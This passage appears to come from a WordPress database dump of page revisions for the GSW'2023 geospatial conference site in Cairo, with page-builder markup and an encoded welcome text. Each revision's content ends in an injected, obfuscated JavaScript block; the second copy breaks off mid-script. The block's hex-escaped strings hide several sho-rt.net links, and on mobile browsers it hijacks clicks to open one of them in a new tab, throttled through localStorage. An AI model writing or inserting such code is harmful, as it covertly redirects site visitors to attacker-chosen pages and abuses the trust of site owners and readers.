vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:09:21','2022-10-05 18:09:21','',2167,'https://gsw2023.com/?p=2303',0,'revision','',0),
(2304,1,'2022-10-05 18:10:11','2022-10-05 18:10:11','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 